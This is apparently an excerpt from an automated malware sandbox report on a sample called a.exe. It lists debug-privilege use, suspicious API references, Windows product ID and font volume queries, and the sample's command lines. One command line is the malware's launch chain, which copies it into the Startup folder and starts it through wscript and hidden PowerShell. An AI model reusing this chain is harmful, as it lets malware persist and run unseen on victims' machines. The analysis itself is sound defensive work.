Source: a.exe, 00000001.00000002.708980355.0000000000B2E000.00000004.00000020.sdmp, a.exe, 0000000B.00000002.771565710.0000000000DC7000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: a.exe, 00000001.00000002.715744246.00000000072C0000.00000002.00000001.sdmp, a.exe, 0000000B.00000002.787547923.0000000006A00000.00000002.00000001.sdmp, a.exe, 00000011.00000002.873462654.0000000006F20000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: a.exe, 00000011.00000002.839119724.0000000000C8A000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllNN
Source: C:\ProgramData\a.exe Process information queried: ProcessInformation

Anti Debugging:

Enables debug privileges
Source: C:\ProgramData\a.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process token adjusted: Debug
Source: C:\ProgramData\a.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

.NET source code references suspicious native API functions
Source: 13.2.a.exe.400000.0.unpack, CC2/LCs.cs Reference to suspicious API methods: ('WXK', 'VirtualProtect@kernel32'), ('LXr', 'GetProcAddress@kernel32'), ('lXy', 'LoadLibrary@kernel32')
Source: 13.2.a.exe.400000.0.unpack, oXs/KX8.cs Reference to suspicious API methods: ('EBg', 'GetProcAddress@kernel32'), ('UBW', 'LoadLibrary@kernel32')
Source: 13.2.a.exe.400000.0.unpack, DCX/jCC.cs Reference to suspicious API methods: ('FCK', 'MapVirtualKey@user32.dll')
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 4
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c timeout 4 & 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js' && powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
Source: C:\ProgramData\a.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c timeout 4 & 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js' && powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
Source: a.exe, 0000000D.00000002.952262097.0000000001730000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: a.exe, 0000000D.00000002.952262097.0000000001730000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: a.exe, 0000000D.00000002.952262097.0000000001730000.00000002.00000001.sdmp Binary or memory string: Progman
Source: a.exe, 0000000D.00000002.952262097.0000000001730000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Queries the product ID of Windows
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId
Queries the volume information (name, serial number etc) of a device
Source: C:\ProgramData\a.exe Queries volume information: C:\ProgramData\a.exe VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
